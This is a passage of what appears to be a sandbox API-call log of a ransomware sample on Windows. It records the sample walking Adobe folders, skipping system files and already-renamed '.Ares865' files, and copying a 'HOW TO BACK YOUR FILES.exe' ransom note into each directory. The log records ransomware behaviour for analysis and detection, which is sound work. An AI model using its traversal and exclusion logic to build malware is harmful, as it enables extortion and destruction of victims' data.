lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="perflogs") returned -1 [0091.540] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="MSBuild") returned -1 [0091.540] lstrlenW (lpString="AdbeRdrSecUpd10111.msp.Ares865") returned 30 [0091.540] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\*") returned 197 [0091.540] lstrcpyW (in: lpString1=0x2cce588, lpString2="AdbeRdrSecUpd10111.msp.Ares865" | out: lpString1="AdbeRdrSecUpd10111.msp.Ares865") returned="AdbeRdrSecUpd10111.msp.Ares865" [0091.540] lstrlenW (lpString="AdbeRdrSecUpd10111.msp.Ares865") returned 30 [0091.540] lstrlenW (lpString="Ares865") returned 7 [0091.541] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0091.541] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4450880, ftCreationTime.dwHighDateTime=0x1cf6c45, ftLastAccessTime.dwLowDateTime=0xb4450880, ftLastAccessTime.dwHighDateTime=0x1cf6c45, ftLastWriteTime.dwLowDateTime=0x67cf1140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x10e3300, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AdbeRdrUpd10110_MUI.msp.Ares865", cAlternateFileName="ADBERD~2.ARE")) returned 1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="aoldtz.exe") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2=".") returned 1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="..") returned 1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="windows") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="bootmgr") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="temp") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="pagefile.sys") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="boot") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="ids.txt") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="ntuser.dat") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="perflogs") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp.Ares865", lpString2="MSBuild") returned -1 [0091.541] lstrlenW (lpString="AdbeRdrUpd10110_MUI.msp.Ares865") returned 31 [0091.541] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.Ares865") returned 226 [0091.541] lstrcpyW (in: lpString1=0x2cce588, lpString2="AdbeRdrUpd10110_MUI.msp.Ares865" | out: lpString1="AdbeRdrUpd10110_MUI.msp.Ares865") returned="AdbeRdrUpd10110_MUI.msp.Ares865" [0091.541] lstrlenW (lpString="AdbeRdrUpd10110_MUI.msp.Ares865") returned 31 [0091.541] lstrlenW (lpString="Ares865") returned 7 [0091.541] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0091.541] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2540cc00, ftCreationTime.dwHighDateTime=0x1d1056e, ftLastAccessTime.dwLowDateTime=0x2540cc00, ftLastAccessTime.dwHighDateTime=0x1d1056e, ftLastWriteTime.dwLowDateTime=0x67f2c5e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x109d300, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AdbeRdrUpd10116_MUI.msp.Ares865", cAlternateFileName="ADBERD~3.ARE")) returned 1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="aoldtz.exe") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2=".") returned 1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="..") returned 1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="windows") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="bootmgr") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="temp") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="pagefile.sys") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="boot") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="ids.txt") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="ntuser.dat") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="perflogs") returned -1 [0091.541] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.Ares865", lpString2="MSBuild") returned -1 [0091.541] lstrlenW (lpString="AdbeRdrUpd10116_MUI.msp.Ares865") returned 31 [0091.541] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.Ares865") returned 227 [0091.542] lstrcpyW (in: lpString1=0x2cce588, lpString2="AdbeRdrUpd10116_MUI.msp.Ares865" | out: lpString1="AdbeRdrUpd10116_MUI.msp.Ares865") returned="AdbeRdrUpd10116_MUI.msp.Ares865" [0091.542] lstrlenW (lpString="AdbeRdrUpd10116_MUI.msp.Ares865") returned 31 [0091.542] lstrlenW (lpString="Ares865") returned 7 [0091.542] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0091.542] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cfe13c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.542] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.542] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cfe13c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0091.542] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.542] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0091.542] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0091.542] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0091.542] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0091.542] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned 185 [0091.542] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0091.542] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.542] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.543] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.543] GetLastError () returned 0x0 [0091.543] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.543] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.543] CloseHandle (hObject=0x120) returned 1 [0091.543] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.543] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.543] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.543] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.543] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.543] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.543] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.543] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.543] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.543] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.543] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.543] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0091.543] lstrcmpiW (lpString1="10.0", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.543] lstrcmpiW (lpString1="10.0", lpString2="aoldtz.exe") returned -1 [0091.544] lstrcmpiW (lpString1="10.0", lpString2=".") returned 1 [0091.544] lstrcmpiW (lpString1="10.0", lpString2="..") returned 1 [0091.544] lstrcmpiW (lpString1="10.0", lpString2="windows") returned -1 [0091.544] lstrcmpiW (lpString1="10.0", lpString2="bootmgr") returned -1 [0091.544] lstrcmpiW (lpString1="10.0", lpString2="temp") returned -1 [0091.544] lstrcmpiW (lpString1="10.0", lpString2="pagefile.sys") returned -1 [0091.544] lstrcmpiW (lpString1="10.0", lpString2="boot") returned -1 [0091.544] lstrcmpiW (lpString1="10.0", lpString2="ids.txt") returned -1 [0091.544] lstrcmpiW (lpString1="10.0", lpString2="ntuser.dat") returned -1 [0091.544] lstrcmpiW (lpString1="10.0", lpString2="perflogs") returned -1 [0091.544] lstrcmpiW (lpString1="10.0", lpString2="MSBuild") returned -1 [0091.544] lstrlenW (lpString="10.0") returned 4 [0091.544] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*") returned 187 [0091.544] lstrcpyW (in: lpString1=0x2cce574, lpString2="10.0" | out: lpString1="10.0") returned="10.0" [0091.544] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0091.544] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x17e) returned 0x318fc8 [0091.544] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0091.544] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cfe13c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.544] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.544] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cfe13c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0091.544] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.544] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0091.544] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0091.544] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x318fc8 | out: hHeap=0x2b0000) returned 1 [0091.544] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0091.544] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned 190 [0091.544] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0091.544] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.544] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.545] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.545] GetLastError () returned 0x0 [0091.545] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.545] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.545] CloseHandle (hObject=0x120) returned 1 [0091.545] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.545] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.545] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.546] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.546] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.546] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.546] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.546] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.546] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.546] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.546] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.546] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cfe13c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.546] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.546] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 1 [0091.546] lstrcmpiW (lpString1="Replicate", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.546] lstrcmpiW (lpString1="Replicate", lpString2="aoldtz.exe") returned 1 [0091.546] lstrcmpiW (lpString1="Replicate", lpString2=".") returned 1 [0091.546] lstrcmpiW (lpString1="Replicate", lpString2="..") returned 1 [0091.546] lstrcmpiW (lpString1="Replicate", lpString2="windows") returned -1 [0091.546] lstrcmpiW (lpString1="Replicate", lpString2="bootmgr") returned 1 [0091.546] lstrcmpiW (lpString1="Replicate", lpString2="temp") returned -1 [0091.546] lstrcmpiW (lpString1="Replicate", lpString2="pagefile.sys") returned 1 [0091.546] lstrcmpiW (lpString1="Replicate", lpString2="boot") returned 1 [0091.546] lstrcmpiW (lpString1="Replicate", lpString2="ids.txt") returned 1 [0091.546] lstrcmpiW (lpString1="Replicate", lpString2="ntuser.dat") returned 1 [0091.546] lstrcmpiW (lpString1="Replicate", lpString2="perflogs") returned 1 [0091.546] lstrcmpiW (lpString1="Replicate", lpString2="MSBuild") returned 1 [0091.546] lstrlenW (lpString="Replicate") returned 9 [0091.546] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*") returned 192 [0091.546] lstrcpyW (in: lpString1=0x2cce57e, lpString2="Replicate" | out: lpString1="Replicate") returned="Replicate" [0091.546] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0091.546] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x192) returned 0x2d6cf0 [0091.546] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0091.546] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 0 [0091.546] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.546] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0091.547] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0091.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0091.547] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned 200 [0091.547] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application 